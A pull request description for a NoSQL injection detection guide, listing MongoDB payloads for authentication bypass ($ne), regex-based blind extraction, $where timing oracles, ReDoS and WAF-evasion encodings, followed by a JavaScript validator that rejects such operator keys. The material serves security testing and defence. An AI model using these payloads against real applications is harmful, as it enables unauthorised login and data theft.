Conversation

@timlzh timlzh commented Dec 3, 2025

Adds a detailed NoSQL injection detection guide following the existing template structure.

Changes

✅ Added nosql_injection.jinja - NoSQL Operator injection, JavaScript execution, ODM exploitation, blind extraction techniques

Testing

Guide follows the established format and includes:

  • Critical context and scope
  • Methodology
  • Injection surfaces
  • Database-specific primitives (MongoDB, CouchDB, Redis, Cassandra, Neo4j)
  • Authentication bypass techniques
  • Data extraction methods
  • WAF/filter bypasses
  • Validation criteria
  • Pro tips

Examples

MongoDB Operator Injection

  • Authentication bypass: {"username": {"$ne": ""}, "password": {"$ne": ""}}
  • Regex extraction: {"password": {"$regex": "^a.*"}} for character-by-character enumeration
  • Query string notation: ?username=admin&password[$ne]=wrongpass

JavaScript Execution

  • $where clause: {"$where": "sleep(5000)"} for timing-based detection
  • $function operator (MongoDB 4.4+): Server-side JS in aggregation pipelines
  • Object.keys() enumeration for field discovery

Blind Extraction

  • Binary search via regex ranges: ^[a-m] vs ^[n-z]
  • Timing oracle: conditional sleep in $where clauses
  • ReDoS patterns: {"$regex": "^(a+)+$"} for pathological backtracking

WAF Bypasses

  • URL encoding: %24ne instead of $ne
  • JSON unicode escapes: \u0024ne
  • Operator alternatives: $not instead of $ne, $nin for negation

Framework-Specific Issues

  • Mongoose: find(req.body) without sanitization
  • PyMongo: Unsanitized dictionaries from JSON input
  • GraphQL + MongoDB: Operator injection via variables

This file provides a comprehensive guide on NoSQL injection vulnerabilities, detailing methodologies, injection surfaces, detection channels, and prevention strategies across various NoSQL databases.
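A defensive counterpart to the Mongoose find(req.body) issue and the operator payloads listed in the description, added here as an example that is not part of the PR or the guide it adds: parse the JSON body, walk it for $-prefixed or dotted keys, and build the login filter from validated strings only. The sample bodies are constructed, and parseLoginBody / findOperatorKeys are names chosen for this example.

```javascript
// Added example (not the PR's own code): reject MongoDB operator injection in a
// login body before it can reach a query such as User.find(req.body).

function findOperatorKeys(value, path = '') {
  // Recursively collect keys MongoDB would treat as operators ($ne, $regex, $where, ...)
  // or as dotted field paths. Arrays are walked too, since $in / $or carry arrays.
  const hits = [];
  if (Array.isArray(value)) {
    value.forEach((v, i) => hits.push(...findOperatorKeys(v, `${path}[${i}]`)));
  } else if (value !== null && typeof value === 'object') {
    for (const key of Object.keys(value)) {
      const here = path ? `${path}.${key}` : key;
      if (key.startsWith('$') || key.includes('.')) hits.push(here);
      hits.push(...findOperatorKeys(value[key], here));
    }
  }
  return hits;
}

function parseLoginBody(rawJson) {
  // Check AFTER JSON.parse: a "\u0024ne" escape in the wire format is already "$ne" here,
  // so the unicode-escape bypass from the description does not slip past the check.
  const body = JSON.parse(rawJson);
  const ops = findOperatorKeys(body);
  if (ops.length) return { ok: false, reason: `operator keys rejected: ${ops.join(', ')}` };
  // A login endpoint only ever needs two scalar strings; objects and arrays are refused.
  const { username, password } = body;
  if (typeof username !== 'string' || typeof password !== 'string') {
    return { ok: false, reason: 'username and password must be strings' };
  }
  // Build the filter explicitly instead of forwarding req.body to the driver.
  return { ok: true, filter: { username, password } };
}

// Constructed sample bodies, shaped like the payloads listed in the PR description.
const SAMPLES = {
  legit: '{"username":"alice","password":"hunter2"}',
  neBypass: '{"username":{"$ne":""},"password":{"$ne":""}}',
  unicodeEscape: '{"username":"admin","password":{"\\u0024regex":"^a.*"}}',
  arrayWrapped: '{"username":"admin","password":{"$in":["a","b"]}}',
  dottedKey: '{"username":"admin","password":"x","profile.role":"admin"}',
};

for (const [name, raw] of Object.entries(SAMPLES)) {
  const r = parseLoginBody(raw);
  console.log(name, r.ok ? 'accepted' : `rejected (${r.reason})`);
}
```

Only the legit sample is accepted; the other four are rejected before any query is built.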